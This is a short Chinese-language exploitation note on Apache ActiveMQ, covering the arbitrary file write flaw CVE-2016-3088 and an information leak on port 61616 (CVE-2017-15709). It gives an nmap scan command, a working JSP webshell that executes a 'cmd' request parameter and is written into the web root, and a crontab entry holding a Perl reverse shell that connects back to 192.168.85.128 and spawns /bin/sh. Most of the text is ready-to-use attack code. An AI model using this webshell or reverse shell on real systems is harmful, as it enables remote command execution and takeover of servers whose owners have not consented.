(CVE-2016-3088)(CVE-2017-15709)

ActiveMQ任意文件写入漏洞（CVE-2016-3088） 

影响范围：5.0.0- 5.13.x

信息收集：nmap -p 8161 192.168.85.130 -A

方法一：写入webshell

<%@ page import="java.io.*"%><% out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null; Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){ out.print(line+"</br>"); }  %>

Destination: file:///opt/activemq/webapps/api/s.jsp

方法二：通过漏洞写入定时反弹shell之crontab       */1 * * * * root /usr/bin/perl -e ‘use Socket;$i=”192.168.85.128″;$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

activemq 信息泄露 （CVE-2017-15709）

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。 Apache ActiveMQ默认消息队列61616端口外，61616端口使用了OpenWire协议，这个端口会暴露服务器相关信息，这些相关信息实际上是debug信息。会返回应用名称JVM，操作系统以及内核版本等信息。